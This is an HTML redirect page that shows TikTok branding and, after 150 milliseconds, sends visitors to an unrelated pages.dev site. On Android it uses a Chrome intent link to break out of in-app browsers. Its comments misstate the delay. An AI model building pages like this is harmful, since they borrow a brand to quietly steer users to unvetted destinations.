<!DOCTYPE html>
<html lang="en">
      <link rel="icon" href="https://sf-tb-sg.ibytedtos.com/obj/eden-sg/uhtyvueh7nulogpoguhm/tiktok-icon2.png" type="image/x-icon">

<head>
  <!-- Replace 'https://www.example.com' with the desired URL -->

<script type="text/javascript">cookieChoices = {};</script>

<script>
function openLinkBasedOnDevice(url) {
  var userAgent = navigator.userAgent;

  if (/(android)/i.test(userAgent)) {
    // If the device is Android, open the link in Chrome
    window.location.href = 'intent://' + url.substring(url.indexOf("://") + 3) + '#Intent;scheme=http;package=com.android.chrome;end;';
  } else if (/(iphone|ipad|ipod)/i.test(userAgent)) {
    // If the device is iOS, open the link in Safari
    window.location.href = url;
  } else {
    // For other devices, open the link in the default browser
    window.location.href = url
  }
}

// Automatically execute the function after a 5-second delay
setTimeout(function() {
  var url = 'https://growiitems.pages.dev';
  openLinkBasedOnDevice(url);
 }, 150); // 500 milliseconds = 5 seconds
</script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
        }

        #tiktok-logo {
            width: 250px;
            margin-bottom: 20px;
        }

        #redirect-text {
            font-size: 30px;
            color: #333;
            opacity: 0;
            animation: fadeIn 2s ease-in-out forwards, scaleUp 2s ease-in-out infinite alternate;
        }

        @keyframes fadeIn {
            0% { opacity: 0; }
            100% { opacity: 1; }
        }

        @keyframes scaleUp {
            0% { transform: scale(1); }
            100% { transform: scale(1.2); }
        }
      #openLink {
        margin: 50px;
        text-align: center;
     
      }
    </style>
  
  
<link rel="me" href="#" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>
    <img id="tiktok-logo" src="https://i.ibb.co/JB4WstC/tiktok-browser.gif" alt="TikTok Logo">
</body>
  
</html>
